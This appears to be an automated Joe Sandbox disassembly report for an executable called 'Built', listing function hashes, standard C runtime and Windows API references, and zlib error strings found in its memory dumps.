                                                              • Opcode ID: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
                                                              • Instruction ID: c40da157341b93ed3d445747ff0f812bf0ff7450512b2b97c9b108885229dc9c
                                                              • Opcode Fuzzy Hash: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
                                                              • Instruction Fuzzy Hash: CF312F72A08B8286EB609F60EC503EE73A4FB84744F44443ADA4D87B94EF7DD558DB12
                                                              APIs
                                                              • _get_daylight.LIBCMT ref: 00007FF626665CB5
                                                                • Part of subcall function 00007FF626665608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62666561C
                                                                • Part of subcall function 00007FF62665A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF626662D92,?,?,?,00007FF626662DCF,?,?,00000000,00007FF626663295,?,?,?,00007FF6266631C7), ref: 00007FF62665A9CE
                                                                • Part of subcall function 00007FF62665A9B8: GetLastError.KERNEL32(?,?,?,00007FF626662D92,?,?,?,00007FF626662DCF,?,?,00000000,00007FF626663295,?,?,?,00007FF6266631C7), ref: 00007FF62665A9D8
                                                                • Part of subcall function 00007FF62665A970: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF62665A94F,?,?,?,?,?,00007FF62665A83A), ref: 00007FF62665A979
                                                                • Part of subcall function 00007FF62665A970: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF62665A94F,?,?,?,?,?,00007FF62665A83A), ref: 00007FF62665A99E
                                                              • _get_daylight.LIBCMT ref: 00007FF626665CA4
                                                                • Part of subcall function 00007FF626665668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62666567C
                                                              • _get_daylight.LIBCMT ref: 00007FF626665F1A
                                                              • _get_daylight.LIBCMT ref: 00007FF626665F2B
                                                              • _get_daylight.LIBCMT ref: 00007FF626665F3C
                                                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF62666617C), ref: 00007FF626665F63
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                              • String ID:
                                                              • API String ID: 4070488512-0
                                                              • Opcode ID: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
                                                              • Instruction ID: ae37007ee07be871dcb339d4716e81cd2b541fbdac04316a19f48e672b003f8e
                                                              • Opcode Fuzzy Hash: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
                                                              • Instruction Fuzzy Hash: 43D1AF32A0824386EF20AF26EC521B96751FF84794F548136EA0DC7696DF3EE441EB43
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                              • String ID:
                                                              • API String ID: 1239891234-0
                                                              • Opcode ID: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                              • Instruction ID: a497083f80058113b1f8584c5be63a6774796f2cb0a83ccd19c71a0369f9f8ab
                                                              • Opcode Fuzzy Hash: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                              • Instruction Fuzzy Hash: 52315136618B8286DB60CF25EC402AE73A4FB89754F540136EA8D87B99EF3DD155CB02
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: FileFindFirst_invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 2227656907-0
                                                              • Opcode ID: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
                                                              • Instruction ID: 734c62f0ad5f04801d570b3fb5f6f8de8eb7da419233af1154954f4c061cf61f
                                                              • Opcode Fuzzy Hash: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
                                                              • Instruction Fuzzy Hash: 58B1B522F1869741EE609B2AED101BDA390FB44BE4F445131EA5E87B85EE3EE445DB03
                                                              APIs
                                                              • _get_daylight.LIBCMT ref: 00007FF626665F1A
                                                                • Part of subcall function 00007FF626665668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62666567C
                                                              • _get_daylight.LIBCMT ref: 00007FF626665F2B
                                                                • Part of subcall function 00007FF626665608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62666561C
                                                              • _get_daylight.LIBCMT ref: 00007FF626665F3C
                                                                • Part of subcall function 00007FF626665638: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62666564C
                                                                • Part of subcall function 00007FF62665A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF626662D92,?,?,?,00007FF626662DCF,?,?,00000000,00007FF626663295,?,?,?,00007FF6266631C7), ref: 00007FF62665A9CE
                                                                • Part of subcall function 00007FF62665A9B8: GetLastError.KERNEL32(?,?,?,00007FF626662D92,?,?,?,00007FF626662DCF,?,?,00000000,00007FF626663295,?,?,?,00007FF6266631C7), ref: 00007FF62665A9D8
                                                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF62666617C), ref: 00007FF626665F63
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                              • String ID:
                                                              • API String ID: 3458911817-0
                                                              • Opcode ID: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
                                                              • Instruction ID: 643c3a2fa5c58860cd54c0ea30182ad44a7f2ba777dd2e4a7e05ff81bd42bf5e
                                                              • Opcode Fuzzy Hash: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
                                                              • Instruction Fuzzy Hash: 4E51A232A0864386EB10DF32FD915A96760FB88784F444136EA4DC76A6DF3EE4449F83
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                              • String ID:
                                                              • API String ID: 2933794660-0
                                                              • Opcode ID: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
                                                              • Instruction ID: 6fc467765ade9874935bc0f7b78c5c82d42c8f3ba605ebb62a0b7e8d01ab5b70
                                                              • Opcode Fuzzy Hash: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
                                                              • Instruction Fuzzy Hash: 86111C26B14B06CAEF00CB60EC552B933A4FB19758F440E31DA6D867A4DF7DD1689782
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: memcpy_s
                                                              • String ID:
                                                              • API String ID: 1502251526-0
                                                              • Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                              • Instruction ID: d193b5daf2bfbb13153529730f29830c28af85d347469e336b8422afdf954569
                                                              • Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                              • Instruction Fuzzy Hash: 20C1E172B1828687EB248F19B44467AB7A1F794B84F449135DB5E93B84DF3EE801CB42
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $header crc mismatch$unknown header flags set
                                                              • API String ID: 0-1127688429
                                                              • Opcode ID: 41de47797cb66f1826093f4b1d60416fd99d26d25a53ce6bfd127eaa39bdfb5e
                                                              • Instruction ID: 1f68ed19e9d90ac1b67d8b418a085532e6d9819677261bf8598c605b67af64fa
                                                              • Opcode Fuzzy Hash: 41de47797cb66f1826093f4b1d60416fd99d26d25a53ce6bfd127eaa39bdfb5e
                                                              • Instruction Fuzzy Hash: A0F1A472A183D55BEBB58F19C898B3A3AA9FF44740F054538DA4987394CF7BE440EB42
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: ExceptionRaise_clrfp
                                                              • String ID:
                                                              • API String ID: 15204871-0
                                                              • Opcode ID: 2f74b2cda317b12825bead48c90720a79ba1abfeed249303701d480a1679e454
                                                              • Instruction ID: a5663bedfefa5d2f26facb7fbaf1c439fcf7abc20f0f921dc357f90239479241
                                                              • Opcode Fuzzy Hash: 2f74b2cda317b12825bead48c90720a79ba1abfeed249303701d480a1679e454
                                                              • Instruction Fuzzy Hash: 00B13977A04B868BEB19CF29D84636837E0F744B48F188A25DE5D877A4CF3AD451DB02
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $
                                                              • API String ID: 0-227171996
                                                              • Opcode ID: 3098a868bf4d382f942c0283459ab4806c0f53f7eb332f8174ba39f6fc7772a0
                                                              • Instruction ID: ccc804700d15148b60ed1c12024c5cfbcb35362ff1e0d5c84bef7ba33b1d3618
                                                              • Opcode Fuzzy Hash: 3098a868bf4d382f942c0283459ab4806c0f53f7eb332f8174ba39f6fc7772a0
                                                              • Instruction Fuzzy Hash: 07E1C83290864682DF689F15C95213D33A0FF55F48F184235DA4EA7696EF2BE851EF03
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: incorrect header check$invalid window size
                                                              • API String ID: 0-900081337
                                                              • Opcode ID: 5aba513b73eb8988df982bd12c0510577381bb82701c7147ce4cedc0b53fa8f7
                                                              • Instruction ID: 53dba3c308eddc2d84e8eb3197df3f32094ffb025228cd17243cba25186919c0
                                                              • Opcode Fuzzy Hash: 5aba513b73eb8988df982bd12c0510577381bb82701c7147ce4cedc0b53fa8f7
                                                              • Instruction Fuzzy Hash: EF918772A182C687EBB58A14D858B7E3A99FB44350F114139DA4AC6784DF7AE940EF03
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: e+000$gfff
                                                              • API String ID: 0-3030954782
                                                              • Opcode ID: b62be3d0480bbbd0e022829aa0980c84d51f153df7fa61e27e52cad2b39beef0
                                                              • Instruction ID: b55b079ea2d24342d73db87b6f4530fba7eb14e0d476e4d61366e5f1273bb81c
                                                              • Opcode Fuzzy Hash: b62be3d0480bbbd0e022829aa0980c84d51f153df7fa61e27e52cad2b39beef0
                                                              • Instruction Fuzzy Hash: 74515A62B182C686EF248F759C427696791F744B94F488232CB9887AC6CE3FE0449B43
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: CurrentFeaturePresentProcessProcessor
                                                              • String ID:
                                                              • API String ID: 1010374628-0
                                                              • Opcode ID: 10bf4b1f0472125ada9b1d6b923a92a2d49e498fcbab652d34985a7b27debbff
                                                              • Instruction ID: f749e03b52842584317245e5b718a65b994ad0f71055c28594de600448abe60a
                                                              • Opcode Fuzzy Hash: 10bf4b1f0472125ada9b1d6b923a92a2d49e498fcbab652d34985a7b27debbff
                                                              • Instruction Fuzzy Hash: 8402FF21A1D69341FE61AB22FE412793694BF45BA0F458634DD5DC63E2DE3FE800AB03
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: gfffffff
                                                              • API String ID: 0-1523873471
                                                              • Opcode ID: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                              • Instruction ID: e1271480f7de2d20af6a1b71abed20b30e1af23441b6a010f77ef39178c99f09
                                                              • Opcode Fuzzy Hash: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                              • Instruction Fuzzy Hash: 4FA12662A087C686EF21CF25A8417A97B95FB64784F048131DE8D877D6DE3ED501DB03
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: TMP
                                                              • API String ID: 3215553584-3125297090
                                                              • Opcode ID: 5f14576829c2a404d65bc8e6713cc3c63392e5e443677cfdf71167dbae88db0a
                                                              • Instruction ID: 2d0f4da0723077baa574c4393a03c100a102fd45134e109de713061b3ab6f0f8
                                                              • Opcode Fuzzy Hash: 5f14576829c2a404d65bc8e6713cc3c63392e5e443677cfdf71167dbae88db0a
                                                              • Instruction Fuzzy Hash: DC51A311F1826651FE64AA2B9D0217A6290BF85BC4F484139DE0EC7BD7EE3FE4056B03
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: HeapProcess
                                                              • String ID:
                                                              • API String ID: 54951025-0
                                                              • Opcode ID: 39e33fd4700d97162abc6aa121af668d241eeaeaed41ff08026f27548e358ff0
                                                              • Instruction ID: 2b8bed1297a1ff26358c6ca539f8d0c433596a6cbd45a9b850731e1f6d1894ea
                                                              • Opcode Fuzzy Hash: 39e33fd4700d97162abc6aa121af668d241eeaeaed41ff08026f27548e358ff0
                                                              • Instruction Fuzzy Hash: CAB09220E07A03C2EE082B61AC9222822A87F48700F980138C00C90330DE2D20F96B43
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5f2a1199bc68cddcf3b08423a19983f3afdde0c7e054ddf4c3f66946da216a90
                                                              • Instruction ID: e9edd9a2c1fe07fb84750fe04bc5ee9b085bd315d3552e46a231995c3ae85282
                                                              • Opcode Fuzzy Hash: 5f2a1199bc68cddcf3b08423a19983f3afdde0c7e054ddf4c3f66946da216a90
                                                              • Instruction Fuzzy Hash: E6D1CA66E0864285EF688E25C85227D2790FB45F48F184235CE0DA7796EF3BE845EB43
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 069bb313382d3adaff5ac451a95cb3dd74dda88d5dd80987c9f0d361d468a953
                                                              • Instruction ID: 4efda2bc065f6658802184cd84fb32e458fde9f34bccc7cc0d4c53d86a449c1b
                                                              • Opcode Fuzzy Hash: 069bb313382d3adaff5ac451a95cb3dd74dda88d5dd80987c9f0d361d468a953
                                                              • Instruction Fuzzy Hash: 8BC1C0722181E08BD299EB29E8794BA73D0F78930DB95406BEF87477C5CB3CA414EB11
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2617fd8e8f043c0917c6a56c5cabdca8b91b1cd744d59a3c82f21f331bc63c74
                                                              • Instruction ID: 72a90f9b16f79b454485f25f5390a746379fce25e24845c33670c42e4b411295
                                                              • Opcode Fuzzy Hash: 2617fd8e8f043c0917c6a56c5cabdca8b91b1cd744d59a3c82f21f331bc63c74
                                                              • Instruction Fuzzy Hash: ADB15E72A0878585EB658F39D89123C3BA8FB45B48F284235DB4D87396CF3AD441EB47
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
